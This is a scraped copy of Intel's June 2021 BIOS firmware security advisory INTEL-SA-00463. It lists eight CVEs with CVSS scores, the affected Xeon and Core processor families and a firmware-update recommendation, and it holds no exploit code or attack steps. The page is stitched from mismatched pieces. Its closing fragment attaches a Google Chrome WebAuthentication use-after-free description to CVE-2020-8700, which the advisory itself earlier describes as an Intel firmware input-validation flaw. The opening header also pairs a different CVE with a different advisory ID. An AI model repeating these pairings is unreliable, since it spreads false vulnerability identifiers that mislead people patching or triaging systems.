For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2021-0089: INTEL-SA-00516

Improper input validation in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

**Select Your Region**

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2021.1 IPU – BIOS Advisory**

Intel ID:

INTEL-SA-00463

Advisory Category:

Firmware

Impact of vulnerability:

Escalation of Privilege, Denial of Service

Severity rating:

HIGH

Original release:

06/08/2021

Last revised:

06/08/2021

**Summary: **

Potential security vulnerabilities in the BIOS firmware for some Intel® Processors may allow escalation of privilege or denial of service.  Intel is releasing firmware updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2020-12357

Description: Improper initialization in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.5 High

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2020-8670

Description: Race condition in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.5 High

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2020-8700

Description: Improper input validation in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.5 High

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2020-12359

Description: Insufficient control flow management in the firmware for some Intel(R) Processors may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 7.1 High

CVSS Vector: CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2020-12358

Description: Out of bounds write in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable denial of service via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:H

CVEID: CVE-2021-0095

Description: Improper initialization in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable a denial of service via local access.

CVSS Base Score: 6.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

CVEID: CVE-2020-12360

Description: Out of bounds read in the firmware for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 5.6 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N

CVEID: CVE-2020-24486

Description: Improper input validation in the firmware for some Intel(R) Processors may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 5.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

**Affected Products:**

·       2nd Generation Intel® Xeon® Scalable Processors

·       Intel® Xeon® Scalable Processors

·       Intel® Xeon® Processor D Family

·       Intel® Xeon® Processor E Family

·       Intel® Xeon® Processor E7 v4 Family

·       Intel® Xeon® Processor E3 v6 Family

·       Intel® Xeon® Processor E3 v5 Family

·       Intel® Xeon® Processor E5 v4 Family

·       Intel® Xeon® Processor E5 v3 Family

·       Intel® Xeon® Processor W Family

·       Intel® Core™ Processors with Intel® Hybrid Technology

·       11th Generation Intel® Core™ Processors

·       10th Generation Intel® Core™ Processors

·       8th Generation Intel® Core™ Processors

·       7th Generation Intel® Core™ Processors

·       6th Generation Intel® Core™ processors

·       Intel® Core™ X-series Processors

**Recommendations:**

Intel recommends that users of the affected products update to the latest firmware version provided by the system manufacturer that addresses these issues.

**Acknowledgements:**

Intel would like to thank NVIDIA Product Security Team (CVE-2020-24486) and Intel employee Hareesh Khattri (CVE-2020-12357) for their reports.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

06/08/2021

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel, processors, chipsets, and desktop boards may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at https://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  
Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2020-8700: INTEL-SA-00463

Use after free in WebAuthentication in Google Chrome on Android prior to 91.0.4472.77 allowed a remote attacker who had compromised the renderer process of a user who had saved a credit card in their Google account to potentially exploit heap corruption via a crafted HTML page.

Tag

#chrome